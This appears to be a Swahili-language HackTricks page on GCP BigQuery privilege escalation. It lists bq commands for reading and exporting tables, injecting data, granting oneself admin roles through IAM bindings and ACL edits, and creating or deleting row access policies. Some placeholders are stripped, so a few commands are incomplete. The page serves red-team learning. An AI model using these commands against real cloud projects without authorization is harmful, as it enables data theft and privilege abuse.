GCP - BigQuery Privesc

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

BigQuery

Kwa habari zaidi kuhusu BigQuery angalia:

GCP - Bigquery Enum

Kusoma taarifa zilizohifadhiwa ndani ya jedwali la BigQuery kunaweza kufunua taarifa nyeti. Ili kupata taarifa hizo, ruhusa zinazohitajika ni bigquery.tables.get, bigquery.jobs.create na bigquery.tables.getData:

Soma data ya jedwali la BigQuery

```bash bq head . bq query --nouse_legacy_sql 'SELECT * FROM `..` LIMIT 1000' ```

Hamisha data

Hii ni njia nyingine ya kupata data. Hamisha kwenye Cloud Storage bucket na pakua faili zilizo na taarifa.
Ili kutekeleza hatua hii ruhusa zifuatazo zinahitajika: bigquery.tables.export, bigquery.jobs.create na storage.objects.create.

Hamisha jedwali la BigQuery kwenda Cloud Storage

```bash bq extract .

"gs:///table*.csv" ```

Ingiza data

Inawezekana kuingiza baadhi ya data za kuaminika katika jedwali la Bigquery ili kutumia udhaifu katika sehemu nyingine. Hii inaweza kufanywa kwa urahisi kwa ruhusa bigquery.tables.get, bigquery.tables.updateData na bigquery.jobs.create:

Ingiza data kwenye jedwali la BigQuery

```bash # Via query bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

Via insert param

bq insert dataset.table /tmp/mydata.json

</details>

### `bigquery.datasets.setIamPolicy`

Mshambuliaji anaweza kutumia vibaya idhini hii ili **kujipa ruhusa za ziada** juu ya dataset ya BigQuery:

<details>
<summary>Weka sera ya IAM kwenye dataset ya BigQuery</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

Ruhusa hii peke yake inakuwezesha kusasisha upatikanaji wako kwa BigQuery dataset kwa kubadilisha ACLs zinazobainisha nani anaweza kuipata:

Update BigQuery dataset ACLs

```bash # Download current permissions, reqires bigquery.datasets.get bq show --format=prettyjson : > acl.json ## Give permissions to the desired user bq update --source acl.json : ## Read it with bq head $PROJECT_ID:.

```

`bigquery.tables.setIamPolicy`

Mshambuliaji anaweza kutumia vibaya haki hii ili kujipa ruhusa zaidi kwenye jedwali la BigQuery:

Weka sera ya IAM kwenye jedwali la BigQuery

```bash # For this you also need bigquery.tables.setIamPolicy bq add-iam-policy-binding \ --member='user:' \ --role='roles/bigquery.admin' \ :.

use the set-iam-policy if you don’t have bigquery.tables.setIamPolicy

</details>

### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Kulingana na nyaraka, kwa ruhusa zilizotajwa inawezekana **kusasisha sera ya ufikiaji ya safu.**\
Hata hivyo, **kwa kutumia cli `bq`** unahitaji baadhi ya ruhusa zaidi: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.

<details>
<summary>Unda au badilisha sera ya ufikiaji ya safu</summary>
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

Inawezekana kupata filter ID katika matokeo ya kuorodhesha sera za ufikiaji za safu. Mfano:

Orodhesha sera za ufikiaji za safu

```bash bq ls --row_access_policies :.

Id Filter Predicate Grantees Creation Time Last Modified Time

apac_filter term = “Cfba” user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09

</details>

Ikiwa una **`bigquery.rowAccessPolicies.delete`** badala ya `bigquery.rowAccessPolicies.update` unaweza pia kufuta sera tu:

<details>
<summary>Futa row access policies</summary>
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Caution

Chaguo lingine linalowezekana la kuzipita sera za upatikanaji za safu ni kubadilisha tu thamani ya data iliyozuiliwa. Ikiwa unaweza kuona tu wakati term ni Cfba, badilisha tu rekodi zote za jedwali ili ziwe na term = "Cfba". Hata hivyo, bigquery inazuia hili.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.